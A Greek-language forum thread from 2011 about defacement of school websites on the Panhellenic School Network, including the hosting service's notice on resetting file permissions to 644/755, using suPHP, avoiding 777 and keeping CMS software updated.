ΟΚ, συγχώνευσα το θέμα με το "κεντρικό" περί της παραβίασης ασφαλείας του ΠΣΔ.

Το ΠΣΔ ώρες-ώρες φαίνεται να πνεει τα λοίσθια πλέον. Μπορεί να είναι πεσμένο για ώρες μέσα στην ημέρα, να έχει μειωμένη ταχύτητα και να βρίθει ιών και άλλων ευγενών προγραμμάτων. Ποιος έχει την γενική εποπτεία του;
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: Δημήτρης Κανάς στις 07 Μαΐου 2011, 06:38:09 ΜΜ
Πάντως να αναγνωρίσουμε πως το (μεγάλο) πρόβλημα είναι στις υπηρεσίες φιλοξενίας και όχι πρόσβασης στο διαδίκτυο από τα σχολεία... 

Δε ξέρω από ταχύτητες...
Τίτλος: Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
Αποστολή από: Νίκος Αδαμόπουλος στις 11 Μαΐου 2011, 12:09:33 ΜΜ
Αγαπητοί χρήστες του Πανελλήνιου Σχολικού Δικτύου,

θα θέλαμε να σας ενημερώσουμε, πως για λόγους ασφαλείας προβήκαμε σε αλλαγή των δικαιωμάτων των αρχείων σε 644 (read+write owner, read group, read other) και σε 755 των φακέλων (read+write+execute owner, read+execute group, read+execute other). Η αλλαγή αυτή ήταν αναγκαία λόγω της αλλοίωσης αρκετών ιστοσελίδων που παρουσιάστηκε το τελευταίο διάστημα. Σε αρκετές από αυτές τις ιστοσελίδες διαπιστώθηκε προσθήκη κακόβουλου κώδικα, γεγονός που οφείλεται σε λανθασμένα δικαιώματα των php αρχείων. Συνεπώς η ρύθμιση των δικαιωμάτων ήταν αναγκαία ενέργεια, καθώς απαιτείται και από τον νέο μηχανισμό ασφαλείας suPHP που εφαρμόζεται από το Πανελλήνιο Σχολικό Δίκτυο. Σε διαφορετική περίπτωση εμφανίζεται το μήνυμα "Internal Server Error".

Για τους παραπάνω λόγους συνιστούμε να μη γίνεται ρύθμιση των δικαιωμάτων των αρχείων και των φακέλων σε 777 (read+write+execute από όλους), καθώς υπάρχει μεγάλος κίνδυνος αλλοίωσης  και δυσλειτουργία της Ιστοσελίδας.

H ορθή ρύθμιση  είναι:

Για  τα αρχεία              644 ( rw-.r--.r-- ) 
Για  τα Directories:      755  ( rwx.r-x.r-x ) 

Υπενθυμίζουμε επίσης πως πρέπει να γίνονται αναβαθμίσεις των CMS πακέτων στις νεότερες εκδόσεις, όταν αυτές διατίθενται, καθώς αποσκοπούν στην διόρθωση κενών ασφαλείας των προηγούμενων εκδόσεων.  Επίσης προτείνουμε  την περιοδική αλλαγή του κωδικού πρόσβασης (password) στο λογαριασμό σας και τον ορισμό ενός δύσκολα προβλέψιμου password.

Για οποιαδήποτε απορία/διευκρίνηση καθώς και δυσλειτουργία της Ιστοσελίδας σας παρακαλούμε να μας ενημερώσετε είτε καταχωρώντας μια αναφορά προβλήματος/αιτήματος στο http://helpdesk.sch.gr είτε αποστέλλοντας e-mail στο webhost (at) sch.gr.

Σας ευχαριστούμε για τη συνεργασία σας. Θα θέλαμε επίσης να επισημάνουμε και εκφράσουμε τα συγχαρητήρια μας, για  την εξαιρετική δουλειά που γίνεται στις ιστοσελίδες σας και τις εφαρμογές που αναπτύσσετε και λειτουργείτε.

Mε εκτίμηση

ΠΑΝΕΛΛΗΝΙΟ ΣΧΟΛΙΚΟ ΔΙΚΤΥΟ
Υπηρεσία Φιλοξενίας ιστοσελίδων
URL:  http://www.sch.gr/webhosting